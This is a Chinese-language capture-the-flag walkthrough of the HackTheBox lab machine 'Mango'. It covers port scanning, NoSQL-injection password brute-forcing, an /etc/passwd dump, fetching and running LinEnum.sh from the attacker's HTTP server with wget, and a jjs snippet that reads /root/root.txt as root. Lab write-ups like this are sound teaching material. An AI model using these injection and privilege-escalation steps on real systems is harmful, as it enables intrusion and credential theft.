大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
摘要
· nosql 注入
· jjs 文件读取
信息收集
nmap扫出了 22 , 80 , 443 端口
root@localhost:~# nmap -sC -sV -p 80,22,443 10.10.10.162 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:53 CST Nmap scan report for bogon (10.10.10.162) Host is up (0.44s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA) | 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA) |_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Search Base | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds
80端口的web并没有什么发现访问443,https的 web 弹出证书提示点击错误代码提示,发现证书
证书解密
发现新站点 staging-order.mango.htb
Nosql 注入
发现登录框mango-nosql注入
root@localhost:~/hackthebox_workspace/finish/Mango#./brute.py h h3 h3m h3mX h3mXK h3mXK8 h3mXK8R h3mXK8Rh h3mXK8RhU h3mXK8RhU~ h3mXK8RhU~f h3mXK8RhU~f{ h3mXK8RhU~f{] h3mXK8RhU~f{]f h3mXK8RhU~f{]f5 h3mXK8RhU~f{]f5H \Mango password: h3mXK8RhU~f{]f5H
拿到密码后 ssh 登录,当前权限找不到user.txt,查看 passwd 发现 admin 用户
mango@mango:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mango:x:1000:1000:mango:/home/mango:/bin/bash admin:x:4000000000:1001:,,,:/home/admin/:/bin/sh mongodb:x:111:65534::/home/mongodb:/usr/sbin/nologin
nosql 注入获取 admin 账号
root@localhost:~/hackthebox_workspace/finish/Mango#./brute.py t t9 t9K t9Kc t9KcS t9KcS3 t9KcS3> t9KcS3>! t9KcS3>!0 t9KcS3>!0B t9KcS3>!0B# t9KcS3>!0B#2 \Admin password: t9KcS3>!0B#2
切换到 admin 账号,获取user.txt,利用python 和 wget 传输枚举脚本
kali: root@localhost:~/hackthebox_workspace# python -m SimpleHTTPServer 80 HTB server: admin@mango:/tmp$ wget http://10.10.xx.xx/LinEnum.sh admin@mango:/tmp$ chmod +x LinEnum.sh admin@mango:/tmp$ ./LinEnum.sh
发现了可以用 jjs(java嵌入式javascript引擎脚本工具https://www.runoob.com/java/java8-nashorn-javascript.html)以 root 权限运行
https://gtfobins.github.io/gtfobins/jjs/#file-read
root 1993 0.0 4.0 2577268 82144 pts/1 Tl 05:55 0:02 jjs admin@mango:/home/mango$ jjs Warning: The jjs tool is planned to be removed from a future JDK release jjs> var BufferedReader = Java.type("java.io.BufferedReader"); jjs> var FileReader = Java.type("java.io.FileReader"); jjs> var br = new BufferedReader(new FileReader("/root/root.txt")); jjs> while ((line = br.readLine()) != null) { print(line); } 8a******************************
